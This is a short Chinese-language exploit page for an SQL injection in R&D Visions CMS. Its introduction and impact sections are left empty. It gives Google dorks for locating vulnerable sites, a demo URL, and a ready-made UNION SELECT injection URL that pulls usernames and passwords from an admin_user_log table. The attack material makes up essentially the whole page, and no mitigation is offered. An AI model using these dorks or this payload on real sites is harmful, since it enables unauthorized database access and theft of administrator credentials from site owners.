001-R&D Visions CMS SQL Injection

# R&D Visions CMS SQL Injection

### 一、漏洞简介

### 二、漏洞影响

### 三、复现过程

Google Dork:

“`
intext:”Website by R&D Visions” inurl:.php?id=

intext:”CMS System by R&D Visions”
“`

Demo:

“`
https://url/home.php?newid=53[SQLi]
“`

Injection:

“`
https://url/home.php?newid=-53+Union+Select+1,Group_ConCat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12+From+admin_user_log–+
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容